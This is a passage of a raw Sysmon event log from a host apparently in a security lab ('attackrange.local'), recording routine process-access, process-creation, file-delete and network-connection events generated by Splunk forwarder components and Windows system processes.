10341000x800000000000000011381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.469{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.609{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9334F4B36C50CE0D673C6E30A8E2CDC6,SHA256=944AE929371D9A0C21D346A7342DBD6B79A44AF6B94C2C81F75541033900990C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:10.062{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:11.640{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2D766A02A21AEBC9324F45282F4C33,SHA256=4D51AAEB2C5B0D683E0FA573EB5AE829CD98184DACA3BE1EFF3A04FA317F0BF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53720-false10.0.1.12-8000- 23542300x800000000000000011400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:12.655{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC1DC2C09B4E2994BB9115A937101221,SHA256=B96E5D83B6F6234905D8E7FB1E90A9FA6E49E54D900D31849129736CBA650C36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:13.702{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950BC7BFC8D9FF5AE9042F8AC8224020,SHA256=73EF8248F05C6850B995C041E0B0FD639DA84C08A1A7E4255894497759B13306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.733{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354C349540EAC34D3F6C5AE143692D0B,SHA256=1DB216849F9171473CF7298D815C1239871C30DBEECE2BC938630BB1A299FA87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.796{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A1BC29570EBFAAC1C3C03D77530082B,SHA256=381DEBBF8F81649D274AC20FAB880CAFEDAC4D261643B15DC70EC20192737B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E8AD742025FEB47D154E38BCB47C1B6,SHA256=DC968949EFAEC12B2DB17204A0399B90370119346E56BB515A79DD014FE5463B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C6A64E182A6A6EBC148FBF36D0EBCEA,SHA256=262B7B272B7753061660CBF43ABEAE30D9A375E85F793E41F4EEB5E7A2A0B34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:16.811{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19E6054C055F4E183B076B2B6B328FCA,SHA256=7343E674DF51EDCF48243AE3C94D1F80F879C1190B7CD0100E2AEDE106148E91,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.647{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53722-false10.0.1.12-8000- 354300x800000000000000011407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.569{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53721-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000011406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.569{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53721-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000011410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:17.905{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4067DC0587F0B81EF5C950330026F130,SHA256=9EEF0C146530EAA93A3710F492C64FC0C1627064CF5E37F9003CAEEAA26D8B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:18.936{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED719921CA83F14ADB53DFAA481C92F,SHA256=54BFD95E5A8796A00B6F7F24B64834493691123B1883B4F96E1004CD5D2203FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:19.983{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EAB9BD5A2BD8E4231B2CB69AF6456C,SHA256=BD0C30F183DF442717027CD4D3EEBD8C4CD4C107B5A1C2C9A4FBC53780054EE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:20.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53723-false10.0.1.12-8000- 23542300x800000000000000011413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:21.014{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94302E58E47FB0D3C2A7A108BDB005A1,SHA256=4626CD065224E59BD1AD06056251DFF70C08EEE18BE5744A2789906E27B02E1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:22.045{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18391529A81D14BD862353D2BB800B88,SHA256=59D5E0FAE3251A8EF01DCA12161F663280703DC020B848E1402613CC878F1501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:23.061{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3644BF0D205058C1A8F2A1E5653A33CD,SHA256=04C832566B3A1C14CB1EAE5348864EFD3AF68518C43D671750713A3FD8DD274D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:24.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A55E7ECFC1BC4DB32B3BF9A7E76D02B9,SHA256=C944BF85230725DAE00C509D5456A090DC30D8C06F259DF9EC4C854DC2CDABF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:25.154{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=782B0BDB5D8D15E156ED42E8DE5E931D,SHA256=7459E834566425DF5FBB36AE064ADD5D5DC60D1EFBA701111C50186A0065D28E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:26.170{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68E23906A85466F42D28143CF8CB679,SHA256=7556C8C22CB6ED9CD22FC7FA672419C9222AC781C8DF560C503DCAAD9D9C139C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:26.490{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53724-false10.0.1.12-8000- 23542300x800000000000000011420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:27.232{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45FC9916C1B75C9D46834723E930478B,SHA256=7C311B135CC69CF7B5C39D3F164A0D3B3E20B0FC099D7E92D55186F589A6CA91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:28.263{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827EF879B3E5336BD7B9E38E9E7E653D,SHA256=13C3283AD9746B33291CC28C5B373FDC2526E68CA0EA9A0A1B4D3429F15EE10C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:29.279{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB988F4AF2A4196E113916A57F8EAF09,SHA256=036538B90A1C36E19809722889B3ECABF13D0C43C66C310EE17EB2B9B0E98584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:30.294{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81ED824A78721AC38FC56EB210295E4E,SHA256=3B5A0E1E463036938F3696BFCC2716769E4639C1C99554A1A73EAE0C59378414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:31.310{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CC01D2EBFE9ED6DCB80A7273ECE08E9,SHA256=672A539FEFDAEA92F58AC475865020D0B836DAD735F43619CC289B7A418881D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:31.615{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53725-false10.0.1.12-8000- 23542300x800000000000000011426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:32.341{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 